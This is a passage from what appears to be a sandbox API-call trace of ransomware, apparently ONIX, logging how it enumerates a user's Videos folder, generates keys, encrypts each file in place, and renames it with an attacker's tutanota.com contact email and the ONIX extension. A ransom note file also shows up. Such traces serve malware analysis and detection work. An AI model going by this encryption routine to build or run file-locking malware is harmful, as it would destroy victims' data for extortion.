dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.887] GetProcessHeap () returned 0x410000 [0121.887] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.887] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.887] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.889] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.890] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.891] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x159c) returned 0x4dcb68 [0121.891] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x159c) returned 0x4de110 [0121.891] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.891] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x159c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x159c, lpOverlapped=0x0) returned 1 [0121.891] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=-5532, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.891] WriteFile (in: hFile=0x4c8, lpBuffer=0x4de110*, nNumberOfBytesToWrite=0x159c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4de110*, lpNumberOfBytesWritten=0x367f44c*=0x159c, lpOverlapped=0x0) returned 1 [0121.892] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x159c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.892] CloseHandle (hObject=0x4c8) returned 1 [0121.893] GetProcessHeap () returned 0x410000 [0121.893] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.893] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tl0vgadx3ypfbbs.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tl0vgadx3ypfbbs.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.894] GetProcessHeap () returned 0x410000 [0121.894] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0121.894] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d20610, ftCreationTime.dwHighDateTime=0x1d5e582, ftLastAccessTime.dwLowDateTime=0x53e14c90, ftLastAccessTime.dwHighDateTime=0x1d5e2c0, ftLastWriteTime.dwLowDateTime=0x53e14c90, ftLastWriteTime.dwHighDateTime=0x1d5e2c0, nFileSizeHigh=0x0, nFileSizeLow=0x421c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tqaZsWz.mp4", cAlternateFileName="")) returned 1 [0121.895] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tqazswz.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.895] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.895] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x421c, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.895] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.895] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.896] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.896] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.896] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.896] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.896] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4", dwFileAttributes=0x80) returned 1 [0121.896] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4") returned 49 [0121.896] GetProcessHeap () returned 0x410000 [0121.896] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd2) returned 0x44faf8 [0121.896] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4" [0121.896] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.896] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=16924) returned 1 [0121.896] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x421c [0121.896] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.896] GetProcessHeap () returned 0x410000 [0121.896] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.896] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.897] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.898] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.899] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.900] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x421c) returned 0x4dcb68 [0121.900] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x421c) returned 0x4e0d90 [0121.900] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.900] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x421c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x421c, lpOverlapped=0x0) returned 1 [0121.900] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=-16924, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.900] WriteFile (in: hFile=0x4c8, lpBuffer=0x4e0d90*, nNumberOfBytesToWrite=0x421c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e0d90*, lpNumberOfBytesWritten=0x367f44c*=0x421c, lpOverlapped=0x0) returned 1 [0121.902] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x421c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.902] CloseHandle (hObject=0x4c8) returned 1 [0121.902] GetProcessHeap () returned 0x410000 [0121.902] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.902] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tqazswz.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tqaZsWz.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tqazswz.mp4.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.904] GetProcessHeap () returned 0x410000 [0121.904] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.904] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f8cf0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x519477f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0121.904] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26c80250, ftCreationTime.dwHighDateTime=0x1d5dab7, ftLastAccessTime.dwLowDateTime=0xce135520, ftLastAccessTime.dwHighDateTime=0x1d5dff6, ftLastWriteTime.dwLowDateTime=0xce135520, ftLastWriteTime.dwHighDateTime=0x1d5dff6, nFileSizeHigh=0x0, nFileSizeLow=0x4a09, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uand2vbIIWfTnwxpEVjx.flv", cAlternateFileName="UAND2V~1.FLV")) returned 1 [0121.904] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uand2vbiiwftnwxpevjx.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.904] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.905] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4a09, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.905] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.905] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.905] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.905] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.906] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.906] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.906] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv", dwFileAttributes=0x80) returned 1 [0121.906] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv") returned 62 [0121.906] GetProcessHeap () returned 0x410000 [0121.906] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x44faf8 [0121.906] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv" [0121.906] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.906] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=18953) returned 1 [0121.906] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4a09 [0121.906] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.906] GetProcessHeap () returned 0x410000 [0121.906] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.906] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.906] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.908] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.909] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.910] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4a09) returned 0x4dcb68 [0121.910] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4a09) returned 0x4e1580 [0121.910] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.910] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x4a09, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x4a09, lpOverlapped=0x0) returned 1 [0121.910] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=-18953, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.910] WriteFile (in: hFile=0x4c8, lpBuffer=0x4e1580*, nNumberOfBytesToWrite=0x4a09, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1580*, lpNumberOfBytesWritten=0x367f44c*=0x4a09, lpOverlapped=0x0) returned 1 [0121.911] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4a09, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.911] CloseHandle (hObject=0x4c8) returned 1 [0121.912] GetProcessHeap () returned 0x410000 [0121.912] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.912] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uand2vbiiwftnwxpevjx.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uand2vbIIWfTnwxpEVjx.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uand2vbiiwftnwxpevjx.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.915] GetProcessHeap () returned 0x410000 [0121.915] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.915] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ca3380, ftCreationTime.dwHighDateTime=0x1d5df90, ftLastAccessTime.dwLowDateTime=0x5ca6e500, ftLastAccessTime.dwHighDateTime=0x1d5e2e4, ftLastWriteTime.dwLowDateTime=0x5ca6e500, ftLastWriteTime.dwHighDateTime=0x1d5e2e4, nFileSizeHigh=0x0, nFileSizeLow=0x167e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VrAu61.flv", cAlternateFileName="")) returned 1 [0121.915] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vrau61.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.915] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.916] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x167e7, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.916] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.916] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.916] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.917] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.917] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.917] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.917] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv", dwFileAttributes=0x80) returned 1 [0121.917] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv") returned 48 [0121.917] GetProcessHeap () returned 0x410000 [0121.917] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd0) returned 0x477600 [0121.917] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv" [0121.917] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.917] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=92135) returned 1 [0121.917] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x167e7 [0121.917] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.917] GetProcessHeap () returned 0x410000 [0121.917] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.917] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.917] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.918] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.921] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x167e7) returned 0xf50048 [0121.923] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x167e7) returned 0xf66838 [0121.923] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.923] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x167e7, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x167e7, lpOverlapped=0x0) returned 1 [0121.927] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x167e7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.927] CloseHandle (hObject=0x4c8) returned 1 [0121.930] GetProcessHeap () returned 0x410000 [0121.930] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.930] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vrau61.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\VrAu61.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vrau61.flv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.932] GetProcessHeap () returned 0x410000 [0121.932] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0121.932] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1618320, ftCreationTime.dwHighDateTime=0x1d5de2b, ftLastAccessTime.dwLowDateTime=0x8d882ed0, ftLastAccessTime.dwHighDateTime=0x1d5de2b, ftLastWriteTime.dwLowDateTime=0x8d882ed0, ftLastWriteTime.dwHighDateTime=0x1d5de2b, nFileSizeHigh=0x0, nFileSizeLow=0x875f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vuAKJq_rveNRS.mkv", cAlternateFileName="VUAKJQ~1.MKV")) returned 1 [0121.932] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vuAKJq_rveNRS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vuakjq_rvenrs.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.932] 